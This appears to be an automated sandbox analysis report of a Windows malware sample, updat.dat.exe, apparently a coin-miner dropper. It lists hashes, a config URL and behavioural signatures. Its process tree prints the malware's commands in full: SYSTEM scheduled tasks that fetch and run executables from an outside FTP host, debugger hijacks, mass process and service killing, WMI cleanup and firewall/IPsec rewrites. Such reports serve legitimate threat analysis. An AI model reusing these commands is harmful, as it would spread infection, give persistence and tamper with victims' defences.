Analysis
-
max time kernel
150s -
max time network
126s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
07-05-2021 13:01
Static task
static1
Behavioral task
behavioral1
Sample
updat.dat.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
updat.dat.exe
Resource
win10v20210408
General
-
Target
updat.dat.exe
-
Size
307KB
-
MD5
a6ab2c2fd64e96dcfbf2cef7b2b40863
-
SHA1
072e8e442c5727d52c42cf892c58cf9f143ed2a7
-
SHA256
f6b85d37652472106287a32fe547d511b0da9d14d4802fc6346d38bff2d8c8a6
-
SHA512
49e83aebe95241348058a5320a8737d0756247892f3b1bfe913bc2a15cf2b1040b88dc897d0b31641d5252740272901d04104cfabb3b32e747489d268eab4de7
Malware Config
Extracted
http://185.26.113.95:8095/batpower2.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 912 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
lsma12.exelsma12.exeexcludess.exeexcludess2.exepid process 1984 lsma12.exe 1952 lsma12.exe 752 excludess.exe 1700 excludess2.exe -
Modifies Windows Firewall 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Windows\inf\aspnet\lsma12.exe upx \Windows\inf\aspnet\lsma12.exe upx C:\Windows\inf\aspnet\lsma12.exe upx -
Loads dropped DLL 3 IoCs
Processes:
cmd.execmd.execmd.exepid process 668 cmd.exe 1672 cmd.exe 1136 cmd.exe -
Drops file in Windows directory 5 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\windows\update.exe powershell.exe File created \??\c:\windows\inf\aspnet\excludess.exe powershell.exe File created \??\c:\windows\inf\aspnet\excludess2.exe powershell.exe File created \??\c:\windows\inf\aspnet\lsma12.exe powershell.exe File created \??\c:\windows\inf\aspnet\config.json powershell.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
lsma12.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 lsma12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString lsma12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz lsma12.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 1512 schtasks.exe 468 schtasks.exe 852 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1984 timeout.exe -
Kills process with taskkill 20 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1672 taskkill.exe 1584 taskkill.exe 852 taskkill.exe 1308 taskkill.exe 1988 taskkill.exe 588 taskkill.exe 1892 taskkill.exe 824 taskkill.exe 1316 taskkill.exe 2012 taskkill.exe 1336 taskkill.exe 552 taskkill.exe 1000 taskkill.exe 1208 taskkill.exe 656 taskkill.exe 756 taskkill.exe 1824 taskkill.exe 1480 taskkill.exe 1956 taskkill.exe 1192 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 60 IoCs
Processes:
powershell.exelsma12.exepid process 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe 1984 lsma12.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1336 taskkill.exe Token: SeDebugPrivilege 552 taskkill.exe Token: SeDebugPrivilege 1000 taskkill.exe Token: SeDebugPrivilege 1208 taskkill.exe Token: SeDebugPrivilege 656 taskkill.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 1672 taskkill.exe Token: SeDebugPrivilege 1956 taskkill.exe Token: SeIncreaseQuotaPrivilege 752 WMIC.exe Token: SeSecurityPrivilege 752 WMIC.exe Token: SeTakeOwnershipPrivilege 752 WMIC.exe Token: SeLoadDriverPrivilege 752 WMIC.exe Token: SeSystemProfilePrivilege 752 WMIC.exe Token: SeSystemtimePrivilege 752 WMIC.exe Token: SeProfSingleProcessPrivilege 752 WMIC.exe Token: SeIncBasePriorityPrivilege 752 WMIC.exe Token: SeCreatePagefilePrivilege 752 WMIC.exe Token: SeBackupPrivilege 752 WMIC.exe Token: SeRestorePrivilege 752 WMIC.exe Token: SeShutdownPrivilege 752 WMIC.exe Token: SeDebugPrivilege 752 WMIC.exe Token: SeSystemEnvironmentPrivilege 752 WMIC.exe Token: SeRemoteShutdownPrivilege 752 WMIC.exe Token: SeUndockPrivilege 752 WMIC.exe Token: SeManageVolumePrivilege 752 WMIC.exe Token: 33 752 WMIC.exe Token: 34 752 WMIC.exe Token: 35 752 WMIC.exe Token: SeIncreaseQuotaPrivilege 752 WMIC.exe Token: SeSecurityPrivilege 752 WMIC.exe Token: SeTakeOwnershipPrivilege 752 WMIC.exe Token: SeLoadDriverPrivilege 752 WMIC.exe Token: SeSystemProfilePrivilege 752 WMIC.exe Token: SeSystemtimePrivilege 752 WMIC.exe Token: SeProfSingleProcessPrivilege 752 WMIC.exe Token: SeIncBasePriorityPrivilege 752 WMIC.exe Token: SeCreatePagefilePrivilege 752 WMIC.exe Token: SeBackupPrivilege 752 WMIC.exe Token: SeRestorePrivilege 752 WMIC.exe Token: SeShutdownPrivilege 752 WMIC.exe Token: SeDebugPrivilege 752 WMIC.exe Token: SeSystemEnvironmentPrivilege 752 WMIC.exe Token: SeRemoteShutdownPrivilege 752 WMIC.exe Token: SeUndockPrivilege 752 WMIC.exe Token: SeManageVolumePrivilege 752 WMIC.exe Token: 33 752 WMIC.exe Token: 34 752 WMIC.exe Token: 35 752 WMIC.exe Token: SeIncreaseQuotaPrivilege 1272 WMIC.exe Token: SeSecurityPrivilege 1272 WMIC.exe Token: SeTakeOwnershipPrivilege 1272 WMIC.exe Token: SeLoadDriverPrivilege 1272 WMIC.exe Token: SeSystemProfilePrivilege 1272 WMIC.exe Token: SeSystemtimePrivilege 1272 WMIC.exe Token: SeProfSingleProcessPrivilege 1272 WMIC.exe Token: SeIncBasePriorityPrivilege 1272 WMIC.exe Token: SeCreatePagefilePrivilege 1272 WMIC.exe Token: SeBackupPrivilege 1272 WMIC.exe Token: SeRestorePrivilege 1272 WMIC.exe Token: SeShutdownPrivilege 1272 WMIC.exe Token: SeDebugPrivilege 1272 WMIC.exe Token: SeSystemEnvironmentPrivilege 1272 WMIC.exe Token: SeRemoteShutdownPrivilege 1272 WMIC.exe Token: SeUndockPrivilege 1272 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
updat.dat.exeWScript.execmd.exedescription pid process target process PID 1360 wrote to memory of 1972 1360 updat.dat.exe WScript.exe PID 1360 wrote to memory of 1972 1360 updat.dat.exe WScript.exe PID 1360 wrote to memory of 1972 1360 updat.dat.exe WScript.exe PID 1360 wrote to memory of 1972 1360 updat.dat.exe WScript.exe PID 1972 wrote to memory of 1772 1972 WScript.exe cmd.exe PID 1972 wrote to memory of 1772 1972 WScript.exe cmd.exe PID 1972 wrote to memory of 1772 1972 WScript.exe cmd.exe PID 1972 wrote to memory of 1772 1972 WScript.exe cmd.exe PID 1772 wrote to memory of 1336 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1336 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1336 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1336 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 552 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 552 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 552 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 552 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1000 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1000 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1000 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1000 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1208 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1208 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1208 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1208 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 656 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 656 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 656 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 656 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1480 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1480 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1480 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1480 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1672 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1672 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1672 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1672 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 856 1772 cmd.exe reg.exe PID 1772 wrote to memory of 856 1772 cmd.exe reg.exe PID 1772 wrote to memory of 856 1772 cmd.exe reg.exe PID 1772 wrote to memory of 856 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1072 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1072 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1072 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1072 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1976 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1976 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1976 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1976 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1272 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1272 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1272 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1272 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1984 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1984 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1984 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1984 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1736 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1736 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1736 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1736 1772 cmd.exe reg.exe PID 1772 wrote to memory of 1956 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1956 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1956 1772 cmd.exe taskkill.exe PID 1772 wrote to memory of 1956 1772 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\updat.dat.exe"C:\Users\Admin\AppData\Local\Temp\updat.dat.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\TEMP\n.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\temp\c3m.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msinfo.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhos.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhou.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhot.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhous.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoss.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rundll32.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhoss.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhous.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhot.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhos.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhou.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msinfo.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im lsma.exe /im lsmab.exe /im wtcs.exe /im ASBservice.exe /im vid001.exe /im netsv.exe /im uihost64 /im uihost32.exe /im wina.exe /im microsoft.net.exe /im dmw.exe /im dhcpclient.exe /im ctfnom.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\temp\conhou.exe /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\temp\conhos.exe /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\temp\conhot.exe /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\system\msinfo.exe /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\debug\item.dat /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\debug\winu.bat /e /d system4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net1 stop ASBservice4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop ASBservice5⤵
-
C:\Windows\SysWOW64\sc.exesc delete ASBservice4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop msupdate4⤵
-
C:\Windows\SysWOW64\sc.exesc delete msupdate4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop clr_optimization_v4.0.30328_644⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30328_644⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop MicrosoftMsql4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMsql4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop netsv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete netsv4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop NetworkServices4⤵
-
C:\Windows\SysWOW64\sc.exesc delete NetworkServices4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop "Network Remote"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Network Remote"4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop "WinTaskCtrlService"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "WinTaskCtrlService"4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop remotecall4⤵
-
C:\Windows\SysWOW64\sc.exesc delete remotecall4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop rpcept4⤵
-
C:\Windows\SysWOW64\sc.exesc delete rpcept4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop csrss4⤵
-
C:\Windows\SysWOW64\sc.exesc delete csrss4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop "windows audio control"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows audio control"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0212.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0212.site>ps&echo test>>ps&echo 1433>>ps&echo get sab.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "oka" /tr "cmd /c start c:\windows\inf\aspnet\lsma12.exe -p" /ru "system" /sc onstart /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "MicrosoftsWindowsa" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "MicrosoftsWindowsu" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "MicrosoftsWindows" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "MicrosoftsWindowsu1" /F4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" delete4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Mysa3" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "ok" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Mysa1" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "WindowsUpdate1" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "OfficeUpdaterA" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "WindowsUpdate3" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "at6" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windows_Update" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Update" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Update2" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Update4" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Update3" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "windowsinit" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System Security Check" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "AdobeFlashPlayer" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "updat_windows" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "at1" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "at2" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete "\Microsoft\Windows\UPnP\Services" /F4⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= auto4⤵
-
C:\Windows\SysWOW64\net.exenet start MpsSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start MpsSvc5⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete policy name=win4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete filterlist name=Allowlist4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete filterlist name=denylist4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete filteraction name=allow4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name="tcp all" dir=in4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name="deny tcp 445" dir=in4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name="deny tcp 139" dir=in4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name="tcpall" dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=win4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1354⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1374⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1384⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1394⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4454⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=win assign=y4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "4⤵
-
C:\Windows\SysWOW64\find.exefind "5.1."4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="coronav" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="coronav2" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="coronav2" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='coronav2'" DELETE4⤵
-
